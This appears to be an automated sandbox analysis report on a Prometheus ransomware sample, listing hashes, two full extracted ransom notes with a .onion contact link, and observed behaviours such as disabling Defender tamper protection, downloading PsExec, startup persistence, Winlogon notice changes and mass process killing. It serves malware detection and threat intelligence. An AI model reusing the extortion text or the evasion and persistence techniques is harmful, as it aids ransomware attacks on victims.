prometheus | 779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc

Analysis

max time kernel
145s
max time network
147s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 06:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Size

233KB
MD5

96c565af56a5ba8339f35121bf9ff196
SHA1

2edae92d476225b00b4a7ea1e9d7f7ccfda462cb
SHA256

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc
SHA512

6d4a3d91396bccae3dff43f6ee295980c1919a48f7914d9b8b6eca3e603aa97b8e05a0b78af27e7f1c86691fff6fc26fad69ddb774f8ed5d8011aa87b511b6c1

Score

10^/10

prometheus evasion persistence ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. -------------------------------------------------------------------------------- We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. -------------------------------------------------------------------------------- As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after it's run. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. -------------------------------------------------------------------------------- !!!!!!!!!!!!!!!!!!!!!!!! If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. !!!!!!!!!!!!!!!!!!!!!!!!! -------------------------------------------------------------------------------- It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: ____________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser. c. Start a chat and follow the further instructions. _____________________________________________________________________________________ Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: xU/GlkGV2gPKE6JR8E3qsD03icvJwnibDhsINA0DAXwDw3jCYwiV7qhW1TczQ77OkDzuIFLseU3UHSVzzx6CMipLDtI2f5YevCfzbHJHMTZuyxCZ04SFkMk6qflu0Vjqg/WOT2ZBvph/xGx+SIhlaV8sNeOqnY0QhoTTqgPhNvHnfPronPYAm0Kqg8PwZpgrLZHBsd7UT6bTcBtJIwhBUSZExgIzXb6UkcHWYh4uj/0pa9FpGVV2ZRXNZbWv0K3jiu+IdrS3bGsyneHF5vej501bUjHxrNKHpukPs618uL2iSURA+35I4BEzJuiFk8gRQEbAAMsgBCAsPJuGyI9wTpr1MBozPCDUSuc7tZK9ZcQ/miPmqOBHHPvl8yc92vXH+NzOgOgkB6IGoHldepTbiJI3jHBKeQr4YIk/anR3v+4IUIyRxx3apcHATTQfggPVM+uB9onKqRBY3xAT89jqu999LwEZx2QorQ25iefPuubPy3ApcL9dSPWWjm6AZglA2fs/cgflMXnx4YbtYO1smdUJ/O+Xpo+TZ1oa6Khsv6i3E6F19lJ14uZ7TlPa0nF6OeBgg5R8aFy+UIfo4jjCwfys502EIQpYUWbzePQ1H5TLBXTlI81p0xwRaCxmnft7RisYkrRJLwf8JAGqwRDpO4LTqHbhsnAzQAzq00PSYP4=

URLs

http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

Family

prometheus

Ransom Note

YOUR COMPANY NETWORK HAS BEEN HACKED All your important files have been encrypted! Your files are safe! Only modified.(AES) No software available on internet can help you. We are the only ones able to decrypt your files. We also gathered highly confidential/personal data. These data are currently stored on a private server. Files are also encrypted and stored securely. As a result of working with us, you will receive: Fully automatic decryptor, all your data will be recovered within a few hours after itâ€™s installation. Server with your data will be immediately destroyed after your payment. Save time and continue working. You will can send us 2-3 non-important files and we will decrypt it for free to prove we are able to give your files back. If you decide not to work with us: All data on your computers will remain encrypted forever. YOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER! So you can expect your data to be publicly available in the near future.. The price will increase over time. It doesn't matter to us what you choose pay us or we will sell your data. We only seek money and our goal is not to damage your reputation or prevent your business from running. Write to us now and we will provide the best prices. Instructions for contacting us: You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM and paste it in the Tor browser. c. Start a chat and follow the further instructions. Attention! Any attempt to restore your files with third-party software will corrupt it. Modify or rename files will result in a loose of data. If you decide to try anyway, make copies before that Key Identifier: xU/GlkGV2gPKE6JR8E3qsD03icvJwnibDhsINA0DAXwDw3jCYwiV7qhW1TczQ77OkDzuIFLseU3UHSVzzx6CMipLDtI2f5YevCfzbHJHMTZuyxCZ04SFkMk6qflu0Vjqg/WOT2ZBvph/xGx+SIhlaV8sNeOqnY0QhoTTqgPhNvHnfPronPYAm0Kqg8PwZpgrLZHBsd7UT6bTcBtJIwhBUSZExgIzXb6UkcHWYh4uj/0pa9FpGVV2ZRXNZbWv0K3jiu+IdrS3bGsyneHF5vej501bUjHxrNKHpukPs618uL2iSURA+35I4BEzJuiFk8gRQEbAAMsgBCAsPJuGyI9wTpr1MBozPCDUSuc7tZK9ZcQ/miPmqOBHHPvl8yc92vXH+NzOgOgkB6IGoHldepTbiJI3jHBKeQr4YIk/anR3v+4IUIyRxx3apcHATTQfggPVM+uB9onKqRBY3xAT89jqu999LwEZx2QorQ25iefPuubPy3ApcL9dSPWWjm6AZglA2fs/cgflMXnx4YbtYO1smdUJ/O+Xpo+TZ1oa6Khsv6i3E6F19lJ14uZ7TlPa0nF6OeBgg5R8aFy+UIfo4jjCwfys502EIQpYUWbzePQ1H5TLBXTlI81p0xwRaCxmnft7RisYkrRJLwf8JAGqwRDpO4LTqHbhsnAzQAzq00PSYP4=

URLs

http://promethw27cbrcot.onion/ticket.php?track=LZG-ZNM-YDNM

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Prometheus Ransomware
Ransomware family mostly targeting manufacturing industry and claims to be affiliated with REvil.
ransomware prometheus
Downloads MZ/PE file

Downloads PsExec from SysInternals website 1 IoCs

Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description	flow	ioc
HTTP URL	19	http://live.sysinternals.com/PsExec64.exe

Executes dropped EXE 1 IoCs

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

pid	Process
4312	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\BlockConnect.tiff	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
File opened for modification	C:\Users\Admin\Pictures\OutWatch.tiff	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Drops startup file 1 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "YOUR COMPANY NETWORK HAS BEEN HACKED"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your important files have been encrypted!\r\nYour files are safe! Only modified.(AES) \r\nNo software available on internet can help you.\r\nWe are the only ones able to decrypt your files.\r\n\r\n!!!!!!!!!!!!!!!!!!!!!!!!\r\nIf you decide not to work with us: \r\nAll data on your computers will remain encrypted forever. \r\nYOUR DATA ON OUR SERVER AND WE WILL RELEASE YOUR DATA TO PUBLIC OR RE-SELLER!\r\nSo you can expect your data to be publicly available in the near future.. \r\nThe price will increase over time. \r\n!!!!!!!!!!!!!!!!!!!!!!!!!\r\n\r\nFull information in the file RESTORE_FILES_INFO"	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 49 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4640	taskkill.exe
4776	taskkill.exe
4488	taskkill.exe
760	taskkill.exe
3344	taskkill.exe
4156	taskkill.exe
4360	taskkill.exe
3040	taskkill.exe
3572	taskkill.exe
3336	taskkill.exe
4320	taskkill.exe
4872	taskkill.exe
5072	taskkill.exe
3896	taskkill.exe
4308	taskkill.exe
4540	taskkill.exe
3888	taskkill.exe
4764	taskkill.exe
4976	taskkill.exe
1672	taskkill.exe
4132	taskkill.exe
3984	taskkill.exe
3648	taskkill.exe
2836	taskkill.exe
4020	taskkill.exe
4104	taskkill.exe
4516	taskkill.exe
4556	taskkill.exe
5028	taskkill.exe
4252	taskkill.exe
2228	taskkill.exe
2820	taskkill.exe
3480	taskkill.exe
1316	taskkill.exe
600	taskkill.exe
4588	taskkill.exe
4692	taskkill.exe
4884	taskkill.exe
3756	taskkill.exe
2464	taskkill.exe
432	taskkill.exe
4444	taskkill.exe
2088	taskkill.exe
4192	taskkill.exe
4372	taskkill.exe
2868	taskkill.exe
1328	taskkill.exe
4204	taskkill.exe
4268	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
752	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
3196	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

pid	Process
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe

Suspicious use of AdjustPrivilegeToken 56 IoCs

Processes:

779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exePAExec-5568-RJMQBVDN.exe1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3924	779db1c725f71e54d4f31452763784abe783afa6a78cc222e17796b0045f33fc.bin.exe
Token: SeDebugPrivilege	3984	taskkill.exe
Token: SeDebugPrivilege	760	taskkill.exe
Token: SeDebugPrivilege	2228	taskkill.exe
Token: SeDebugPrivilege	2868	taskkill.exe
Token: SeDebugPrivilege	3040	taskkill.exe
Token: SeDebugPrivilege	3648	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	3336	taskkill.exe
Token: SeDebugPrivilege	2836	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	3480	taskkill.exe
Token: SeDebugPrivilege	4020	taskkill.exe
Token: SeDebugPrivilege	3888	taskkill.exe
Token: SeDebugPrivilege	3344	taskkill.exe
Token: SeDebugPrivilege	432	taskkill.exe
Token: SeDebugPrivilege	1328	taskkill.exe
Token: SeDebugPrivilege	1316	taskkill.exe
Token: SeDebugPrivilege	600	taskkill.exe
Token: SeDebugPrivilege	4104	taskkill.exe
Token: SeDebugPrivilege	4156	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4268	taskkill.exe
Token: SeDebugPrivilege	4320	taskkill.exe
Token: SeDebugPrivilege	4360	taskkill.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	4556	taskkill.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4640	taskkill.exe
Token: SeDebugPrivilege	4692	taskkill.exe
Token: SeDebugPrivilege	4776	taskkill.exe
Token: SeDebugPrivilege	4764	taskkill.exe
Token: SeDebugPrivilege	4884	taskkill.exe
Token: SeDebugPrivilege	4872	taskkill.exe
Token: SeDebugPrivilege	4976	taskkill.exe
Token: SeDebugPrivilege	5028	taskkill.exe
Token: SeDebugPrivilege	5072	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	1672	taskkill.exe
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeDebugPrivilege	3896	taskkill.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeDebugPrivilege	4132	taskkill.exe
